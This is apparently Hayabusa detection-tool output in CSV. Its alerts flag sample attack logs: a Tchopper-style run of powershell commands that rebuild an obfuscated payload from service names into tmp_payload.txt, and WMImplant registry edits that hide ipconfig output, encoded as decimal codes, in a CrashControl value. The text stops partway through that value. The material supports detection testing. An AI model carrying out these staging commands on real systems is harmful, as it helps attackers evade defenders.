2021-11-03 17:39:59.127 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg228"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x490 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:00.581 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg229"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xacc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:00.581 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg229"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xff4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:02.034 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg230"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc94 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:02.050 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg230"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc10 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:03.487 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg231"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc64 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:03.503 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg231"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf78 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:04.941 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg232"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd14 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:04.941 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg232"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf3c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:06.381 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg233"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdb0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:06.381 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg233"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc30 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:07.834 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg234"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xfb0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:07.834 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg234"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x38c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:09.316 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg235"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe7c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:09.331 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg235"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:10.768 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg236"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdcc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:10.768 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg236"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe58 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:12.215 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg237"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x888 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:12.215 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg237"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x394 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:13.660 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg238"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe24 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:13.660 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg238"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc54 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:15.098 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg239"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x22c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:15.113 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg239"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf34 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:16.552 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg240"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x68c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:16.552 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg240"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdf8 | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:40:18.002 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg241"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:40:18.002 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg241"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb1c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:40:19.468 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg242"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x608 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:40:19.484 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg242"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x874 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:40:20.926 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg243"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xab4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:40:20.942 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg243"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xeb4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:40:22.374 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg244"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:40:22.390 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg244"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x944 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:53:41.099 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\LogEvent: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: 
A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\SendAlert: DWORD (0x00000000) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\CrashDumpEnabled: DWORD (0x00000007) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\Overwrite: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 
19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\KernelDumpOnly: DWORD (0x00000000) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,CrashControl CrashDump Disabled,,rules/sigma/registry_event/registy_event_crashdump_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,CrashControl CrashDump Disabled,,rules/sigma/registry_event/registy_event_crashdump_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:55.139 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\AutoReboot: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:55.139 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\DumpFile: 
87,105,110,100,111,119,115,32,73,80,32,67,111,110,102,105,103,117,114,97,116,105,111,110,13,10,13,10,32,32,32,72,111,115,116,32,78,97,109,101,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,102,115,48,51,118,117,108,110,13,10,32,32,32,80,114,105,109,97,114,121,32,68,110,115,32,83,117,102,102,105,120,32,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,111,102,102,115,101,99,46,108,97,110,13,10,32,32,32,78,111,100,101,32,84,121,112,101,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,72,121,98,114,105,100,13,10,32,32,32,73,80,32,82,111,117,116,105,110,103,32,69,110,97,98,108,101,100,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,78,111,13,10,32,32,32,87,73,78,83,32,80,114,111,120,121,32,69,110,97,98,108,101,100,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,78,111,13,10,32,32,32,68,78,83,32,83,117,102,102,105,120,32,83,101,97,114,99,104,32,76,105,115,116,46,32,46,32,46,32,46,32,46,32,46,32,58,32,111,102,102,115,101,99,46,108,97,110,13,10,13,10,69,116,104,101,114,110,101,116,32,97,100,97,112,116,101,114,32,69,116,104,101,114,110,101,116,48,58,13,10,13,10,32,32,32,67,111,110,110,101,99,116,105,111,110,45,115,112,101,99,105,102,105,99,32,68,78,83,32,83,117,102,102,105,120,32,32,46,32,58,32,13,10,32,32,32,68,101,115,99,114,105,112,116,105,111,110,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,73,110,116,101,108,40,82,41,32,56,50,53,55,52,76,32,71,105,103,97,98,105,116,32,78,101,116,119,111,114,107,32,67,111,110,110,101,99,116,105,111,110,13,10,32,32,32,80,104,121,115,105,99,97,108,32,65,100,100,114,101,115,115,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,48,48,45,53,48,45,53,54,45,57,55,45,50,66,45,55,55,13,10,32,32,32,68,72,67,80,32,69,110,97,98,108,101,100,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,78,111,13,10,32,32,32,65,117,116,111,99,111,110,102,105,103,117,114,97,116,105,111,110,32,69,110,97,98,108,101,100,32,46,32
